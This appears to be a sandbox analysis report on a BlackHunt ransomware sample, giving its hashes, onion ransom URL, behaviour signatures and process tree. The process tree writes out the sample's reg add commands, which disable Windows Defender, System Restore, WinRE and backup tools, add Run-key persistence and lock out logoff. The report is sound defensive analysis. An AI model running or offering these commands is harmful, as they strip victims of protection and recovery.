Analysis
max time kernel: 119s
max time network: 120s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64 arch:x86 image:win7-20231215-en locale:en-us os:windows7-x64 system
submitted: 28/01/2024, 16:55
Static task: static1
Behavioral task: behavioral1
  Sample: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe
  Resource: win10v2004-20231222-en
General
Target: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe
Size: 707KB
MD5: f61f804d4e954683fde465786ce6fa2c
SHA1: 6ea10e4f100586e99552889101e64e6bc92b61ef
SHA256: a183b5e1befb6280842a93e6e183834682e28641a849c3980df27b5e462a2bb7
SHA512: 295875e90b0e852911df16bad9bbe1c1319d525b5ee3ac6feb336786e9904e4f8fde238ead1acd6772a58578b7db29bef7cbfef54aa08817653554862d3a087a
SSDEEP: 6144:/cmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1T84vnh:TuaTmkZJ+naie5OTamgEoKxLWSGh
Note that the file name is itself a SHA256-shaped string but does not match this file's SHA256 above; pivot on the hashes, not on the name.
Malware Config
Extracted from: C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible" (a meta-tag attribute carried over from the HTA markup, not an indicator)
URL: http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
(The signature list merges both behavioral tasks. PIDs are per task and can collide across them, e.g. 2772 appears below as both wbadmin.exe and PING.EXE, and 2536 as both mshta.exe and cmd.exe.)
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent per-volume NTFS log of file changes on any Windows system, not only Windows Server; deleting it removes a timeline that forensic tooling relies on.
  pid 1692 fsutil.exe
  pid 3932 fsutil.exe
Modifies Windows Defender Real-time Protection settings
  Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
UAC bypass
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe)
Clears Windows event logs 1 TTPs 5 IoCs
  pid 3768 wevtutil.exe
  pid 2016 wevtutil.exe
  pid 2560 wevtutil.exe
  pid 2204 wevtutil.exe
  pid 2520 wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
  pid 280 bcdedit.exe
  pid 572 bcdedit.exe
  pid 3976 bcdedit.exe
  pid 1728 bcdedit.exe
Renames multiple (2879) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
(signature heading not preserved in the extract) 2 IoCs
  pid 2772 wbadmin.exe
  pid 3900 wbadmin.exe
Disables Task Manager via registry modification
Disables use of System Restore points 1 TTPs
Deletes itself 1 IoCs
  pid 1524 cmd.exe
Adds Run key to start application 2 TTPs 1 IoCs
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" (reg.exe)
Checks whether UAC is enabled
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe)
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe: \??\A:, \??\B:, \??\E:, \??\G:, \??\H:, \??\I:, \??\J:, \??\K:, \??\L:, \??\M:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\R:, \??\S:, \??\T:, \??\U:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\Z: (23 entries; every letter except C:, D: and F:)
  File opened (read-only) by vssadmin.exe: \??\F: (2 entries)
  File opened (read-only) by fsutil.exe: \??\F:, \??\M:
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 2: ip-api.com
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" (eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe)
Drops file in Program Files directory 64 IoCs
All 64 entries are attributed to eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe. The created files are the ransom note (#BlackHunt_ReadMe.txt / #BlackHunt_ReadMe.hta) and a #BlackHunt_Private.key file dropped per directory; the files opened for modification are existing application data, consistent with the 2879 renames reported above.
File created (19):
  C:\Program Files\Java\jre7\#BlackHunt_ReadMe.txt
  C:\Program Files\VideoLAN\VLC\locale\as_IN\#BlackHunt_ReadMe.hta
  C:\Program Files\VideoLAN\VLC\locale\hr\#BlackHunt_ReadMe.hta
  C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#BlackHunt_ReadMe.hta
  C:\Program Files\VideoLAN\VLC\plugins\#BlackHunt_Private.key
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\#BlackHunt_Private.key
  C:\Program Files\VideoLAN\VLC\locale\ky\#BlackHunt_Private.key
  C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#BlackHunt_Private.key
  C:\Program Files\VideoLAN\VLC\locale\nl\#BlackHunt_Private.key
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#BlackHunt_ReadMe.hta
  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\#BlackHunt_Private.key
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#BlackHunt_Private.key
  C:\Program Files\Java\jre7\lib\zi\America\Kentucky\#BlackHunt_ReadMe.hta
  C:\Program Files\VideoLAN\VLC\plugins\mux\#BlackHunt_ReadMe.hta
  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\#BlackHunt_Private.key
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#BlackHunt_ReadMe.hta
  C:\Program Files\VideoLAN\#BlackHunt_ReadMe.hta
  C:\Program Files\VideoLAN\VLC\locale\ky\#BlackHunt_ReadMe.hta
  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\#BlackHunt_Private.key
File opened for modification (45):
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF
  C:\Program Files\DVD Maker\Shared\DvdStyles\BlackRectangle.bmp
  C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_glass_Thumbnail.bmp
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml
  C:\Program Files\7-Zip\Lang\uk.txt
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar
  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar
  C:\Program Files\RestoreLock.crw
  C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kaliningrad
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar
  C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac
  C:\Program Files\7-Zip\Lang\da.txt
  C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar
  C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-13
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar
  C:\Program Files\7-Zip\Lang\hr.txt
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterRegular.ttf
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html
  C:\Program Files\Java\jre7\lib\zi\Asia\Pyongyang
  C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png
  C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha2.png
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 2396 schtasks.exe
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid 2612 vssadmin.exe
  pid 4072 vssadmin.exe
  pid 816 vssadmin.exe
  pid 1436 vssadmin.exe
  pid 1588 vssadmin.exe
  pid 2920 vssadmin.exe
Kills process with taskkill 1 IoCs
  pid 2120 taskkill.exe
Modifies registry class 10 IoCs
  Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 (reg.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ (reg.exe)
  Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon (reg.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
  Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 (reg.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ (reg.exe)
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 (conhost.exe)
  Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon (conhost.exe)
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon (conhost.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (conhost.exe)
  The conhost.exe attributions most likely belong to the reg.exe invocation for Hunt2\DefaultIcon (PID 2160 in the process tree, which carries no "Modifies registry class" label); they are not evidence of a separate actor.
Runs ping.exe 1 TTPs 1 IoCs
  pid 2772 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  pid 2536 mshta.exe
Suspicious use of AdjustPrivilegeToken 24 IoCs
  2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe: SeDebugPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeTakeOwnershipPrivilege, SeAuditPrivilege, SeSecurityPrivilege, SeIncBasePriorityPrivilege
  2140 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  2196 wbengine.exe: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
  3768 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  2016 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  2560 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  2204 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  2520 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  2120 taskkill.exe: SeDebugPrivilege
Suspicious use of WriteProcessMemory 64 IoCs
Identical entries are collapsed with a count; child images are taken from the process tree below. procid_target is the child's index in the tree.
  2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe wrote to 2700 cmd.exe (procid_target 29) x4
  2500 wrote to 2796 cmd.exe (31) x4
  2500 wrote to 2812 cmd.exe (33) x4
  2700 cmd.exe wrote to 2784 reg.exe (35) x3
  2500 wrote to 2696 cmd.exe (36) x4
  2796 cmd.exe wrote to 2356 reg.exe (39) x3
  2500 wrote to 2992 cmd.exe (38) x4
  2500 wrote to 2752 cmd.exe (40) x4
  2500 wrote to 2536 cmd.exe (42) x4
  2500 wrote to 2520 cmd.exe (45) x4
  2500 wrote to 2632 cmd.exe (46) x4
  2500 wrote to 2764 cmd.exe (49) x4
  2696 cmd.exe wrote to 2160 reg.exe (140) x3
  2500 wrote to 2592 cmd.exe (50) x4
  2812 cmd.exe wrote to 2620 reg.exe (52) x3
  2500 wrote to 2640 cmd.exe (53) x4
  2500 wrote to 2712 cmd.exe (55) x4
System policy modification 1 TTPs 3 IoCs
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe)
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe)
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" (eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe)
  Note that these three writes are made by the sample process itself, not through reg.exe, so they do not appear in the command lines in the process tree. EnableLinkedConnections = 1 makes drive letters mapped under the user's standard token visible to its elevated token, which lets an elevated encryptor reach mapped network shares.
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe
  "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe"
  PID:2500
  - UAC bypass
  - Checks whether UAC is enabled
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    PID:2700
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      PID:2784
      - Modifies registry class
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    PID:2796
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      PID:2356
      - Modifies registry class
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    PID:2812
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
      PID:2620
      - Modifies registry class
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    PID:2696
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      PID:2160
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    PID:2992
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      PID:2680
      - Adds Run key to start application
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    PID:2752
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      PID:2840
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    PID:2536
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      PID:1704
      - Modifies Windows Defender Real-time Protection settings
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    PID:2520
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
      PID:1164
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    PID:2632
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
      PID:1836
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    PID:2764
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
      PID:2652
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    PID:2592
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
      PID:1652
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    PID:2640
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
      PID:1376
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    PID:2712
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
      PID:1436
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    PID:2484
    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
      PID:1208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1384
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2888
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2956
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2916
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2480
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2128
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2136
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2008
-
